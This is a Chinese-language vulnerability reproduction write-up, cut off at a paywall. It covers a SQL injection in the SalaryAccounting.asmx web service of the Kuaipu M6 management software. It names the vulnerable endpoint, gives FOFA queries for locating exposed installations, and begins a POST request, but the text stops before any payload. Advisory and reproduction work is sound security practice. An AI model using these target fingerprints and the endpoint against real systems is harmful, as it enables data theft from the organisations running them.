0x01、概述
基本信息:
快普M6pro产品主要解决这些行业的集成管理、销售管理、运维管理、租赁管理、协同办公管理和供应链财务管理等管理需求,建立可持续发展的经营管理模式,彻底消除信息孤岛和管理死角。
漏洞描述:
快普M6 的 /WebService/HR/Salary/SalaryAccounting.asmx 接口处存在SQL注入漏洞,攻击者可以窃取用户的隐私信息、业务数据等,造成用户信息泄露、企业品牌受损、法律风险等相关安全问题。
0x02、资产测绘
FOFA:
| body=“Resource/JavaScript/jKPM6.DateTime.js” |
| app=“快普-M6” |
0x03、漏洞复现
3.1、抓包测试
POST请求包:
POST /WebService/HR/Salary/SalaryAccounting.asmx HTTP/1.1
Host: host
SOAPAction: http://tempuri.org/Calculate
Content-Type: text/xml;charset=UTF-8
User-Agent: Mozilla/5
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
